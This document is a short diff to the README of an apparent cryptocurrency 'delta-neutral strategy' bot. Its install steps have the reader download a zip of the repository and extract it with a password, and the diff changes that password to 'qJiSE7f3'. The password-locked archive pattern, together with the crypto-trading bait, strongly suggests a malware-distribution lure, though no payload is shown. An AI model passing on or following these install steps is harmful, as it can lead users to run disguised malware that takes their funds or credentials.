medlaare/delta-neutral-strategy/README.md

 ## How to install
 - [Clone](https://github.com/medlaare/delta-neutral-strategy/archive/refs/heads/main.zip) the repository and follow the step-by-step setup guide in the documentation.
-- Extract archive with password `x`
+- Extract archive with password `qJiSE7f3`
 - Modify the config file:
  1. `rpc_url` is the endpoint for the Ethereum, Polygon, and Arbitrum RPC providers.
  2. `gas_limit` and `gas_price` are parameters to control transaction costs.